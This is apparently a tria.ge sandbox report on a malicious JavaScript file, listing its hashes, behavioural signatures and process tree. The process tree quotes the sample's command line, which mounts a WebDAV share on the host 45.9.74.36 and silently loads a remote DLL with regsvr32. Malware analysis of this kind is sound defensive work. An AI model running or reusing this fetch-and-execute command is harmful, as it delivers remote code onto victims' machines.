Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
134s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 01:12
Static task
static1
Behavioral task
behavioral1
Sample
271141561769318333.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
271141561769318333.js
Resource
win10v2004-20240709-en
General
-
Target
271141561769318333.js
-
Size
4KB
-
MD5
b82ad5cefac75aab33ac73dcc411d74f
-
SHA1
75f9d25bf3a93d0b8c26f60c496db9ca4391afa9
-
SHA256
d6cfc724b09006bf71b445b43e5a3e7ced4eafcc7f33b8f424ea718ab774c00e
-
SHA512
d2972002fb2fe5363de28c1a5ff33a719274b3186edc80d0e8549b569af162b57f08ef27e89e65af25699040bf5e4f618b9385d0892df2c83f2f631fcbd63a6a
-
SSDEEP
96:Basmb8kIPGqaMiv4IQfumDYMsUeh8WXEILvqb6MuBKf2htloGr3ozrLJ21MzoJKu:34vhlOwTAkLbTF
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1640 wrote to memory of 2648 1640 wscript.exe 84 PID 1640 wrote to memory of 2648 1640 wscript.exe 84 PID 2648 wrote to memory of 1676 2648 cmd.exe 86 PID 2648 wrote to memory of 1676 2648 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\271141561769318333.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\7247283058152.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:1676
-
-